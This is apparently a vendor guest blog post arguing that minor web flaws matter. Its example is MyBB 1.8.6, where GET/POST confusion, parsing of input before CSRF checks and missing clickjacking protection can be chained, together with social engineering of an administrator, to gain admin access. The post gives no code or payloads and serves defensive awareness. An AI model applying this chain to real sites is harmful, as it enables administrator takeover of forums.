The following is a guest post by a 2016 Secure360 Twin Cities Gold Sponsor Qualys.
As attacks against web applications rise, cyber security teams naturally have prioritized the elimination of high-risk threats, such as SQL injections and cross-site scripting (XSS) vulnerabilities. The flip side of this is that many cybersecurity teams choose to ignore or delay the remediation of low-level security vulnerabilities in their web applications. Unfortunately, this isn’t a wise strategy. Underestimating the importance of fixing low-level security issues could create a major problem for an organization. Why? By exploiting a combination of seemingly trivial vulnerabilities, attackers can sometimes open up a big security gap that lets them do extreme damage. In this article, I will demonstrate such a scenario, showing how by taking advantage of several unfixed low-level security issues, an attacker could transform insignificant security issues into an armor-piercer to break your web applications!
Low Level Security Issues share unique factors
For attackers, low-level security vulnerabilities are simple and inexpensive to discover, as well as straightforward to exploit. For instance, I conducted surveys about clickjacking, which is treated as minor security issue, among the top 20 bank websites, and surprisingly found that 70 percent were at risk of clickjacking attacks in 2012 and 45 percent in 2015.
Meanwhile, webmasters usually treat low-level vulnerabilities as trivial issues until a real breach occurs. This means that low level security issues persist longer on web applications, giving attackers time to leverage them for mounting a major attack.
Modern web application firewalls can be configured to block low level security issues, but often webmasters will not bother to do so, leaving these vulnerabilities as “blind spots.” This means that some WAFs (web application firewalls) will not be able to block the threats when attackers are manipulating the web applications via these low level security threats.
After taking into account all the above-mentioned factors, it is easy to understand why low level security issues could open the first door to take down your web applications.
In a recent audit of MyBB, an open source application which people use to create discussion forums, I found three low-level security issues. If exploited in aggregate, these flaws could allow a hacker to gain total control of MyBB. The issue has been partially addressed in its latest version — MyBB 1.8.7 – so users are no longer vulnerable to the danger described here.
Three low level issues discovered in MyBB
MyBB 1.8.6 contains the following minor security issues, which seem trivial if they are evaluated separately.
“GET” and “POST” methods are not distinguished
The “GET” and “POST” methods are the most commonly used for making HTTP requests. From a security perspective, using the “POST” method to submit sensitive data is always recommended. Those interested in learning in detail the security differences between the “POST” and “GET” methods should read this article which goes into fine-grained detail.
MyBB adopts the “POST” method at its ACP (Administrator Control Pages) for submitting sensitive data, such as, add users, web application setting and database backup. However, the web application does not strictly distinguish “POST” and “GET” requests, although it is designed to use the “POST” method by default for some types of sensitive requests, such as adding an “administrator” user.
Data is processed before the CSRF (cross-site request forgery) validation
A robust server should block the request and forbid parsing the forged value when it detects the CSRF token is not valid or is missing. But in this case, the web application is still parsing the forged value and entering the forged value into the input field despite the missing CSRF parameter in the request.
Clickjacking is an attack that tricks a web user into clicking a button, link or picture by overlaying the vulnerable web page with an iframe.
The absence of a clickjacking countermeasure is another security issue in this application. This one is the last nail in the coffin. By taking advantage of this vulnerability, the ACP pages could be framed by an attacker and he or she could trick the victims into clicking on something inadvertently.
Gain admin access of by using these vulnerabilities
After exploiting all these minor security issues, it would be as easy as taking candy from a baby for an attacker to gain administrator access. It just requires some social engineering work to trick the administrator user to click on a button or a link in a framing page! More details can be found in the Qualys Blog.
As the saying goes, small leaks will sink a big ship. Several low-level security issues could crack the hull of your web application. This danger is especially real these days when cyber attackers have become particularly sophisticated and don’t limit themselves to traditional exploits.
It is not uncommon to see some low-level security flaw reside in a web application for a long time, even though the Qualys WAS (Web Application Scanner) flags these security holes. I hope this article flashes a red warning light for webmasters and web developers the next time they have to decide whether to ignore low-level security issues.